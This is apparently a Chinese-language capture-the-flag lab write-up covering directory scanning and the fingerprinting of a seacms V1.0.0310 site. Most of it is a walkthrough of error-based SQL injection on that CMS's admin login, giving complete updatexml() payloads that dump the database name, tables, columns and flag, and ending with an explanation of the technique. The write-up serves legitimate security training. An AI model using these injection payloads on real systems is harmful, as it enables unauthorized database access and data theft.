信息搜集1

目录扫描

Tips:
信息收集作为渗透测试的第一步，能决定后续测试的走向，甚至能直接找到目标的漏洞，那么如何才能在繁杂的网络世界里找到所需的数据呢？
尤里开始了努力……
最终他找到了目标的……
成功掌握了这一技能

直接扫目录就能得到flag，但这里flag在二级目录里，扫了半天没找到(字典太垃圾了>’’<)

信息搜集2

网站指纹查询与利用

Tips:

经过上次的事件，尤里深刻了解到信息收集的重要性，这次他决定利用信息收集轻松搞定个站点……

这个cms好像有个sql注入漏洞，找到它，拿到数据库里的flag吧！

成功找到网站指纹，seacms版本 V1.0.0310，可以指纹信息搜寻对应的漏洞

这样的话就是把cms源码下下来分析，确定后台登录的大致路径，然后扫描目录找后台地址，

其实谷歌语法更快一些

后台登录页面sql报错注入

尝试发现有sql注入点，

暴库：

user=1' or updatexml(1,concat(0x7e,(select database()),0x7e),1)#&password=aaaaa&login=yes

暴表：

user=1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = database()),0x7e),1)#&password=aaaaa&login=yes

暴字段

user=1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name = 'flag'),0x7e),1)#&password=aaaaa&login=yes

暴数据

user=1' or updatexml(1,concat(0x7e,(select flag from flag),0x7e),1)#&password=aaaaa&login=yes

补充：

MYSQL updatexml()函数报错注入解析

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc
第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。
第三个参数：new_value，String格式，替换查找到的符合条件的数据

作用：改变文档中符合条件的节点的值

PS：高版本的mysql已经修复了该bug

MySQL 5.1.5版本中添加了对XML文档进行查询和修改的函数，分别是ExtractValue()和UpdateXML()，这两个函数的用法基本一样，只不过前一个是查询，第二个是修改

我们要学习的便是mysql里的修改函数即updatexml函数

updatexml函数第二个参数 xml中的位置是可操作的地方，xml文档中修改的字符位置是用 /xxx/xxx/xxx/…这种格式，如果我们写入其他格式，就会报错，并且会返回我们写入的非法格式内容，而这个非法的内容就是我们想要查询的内容。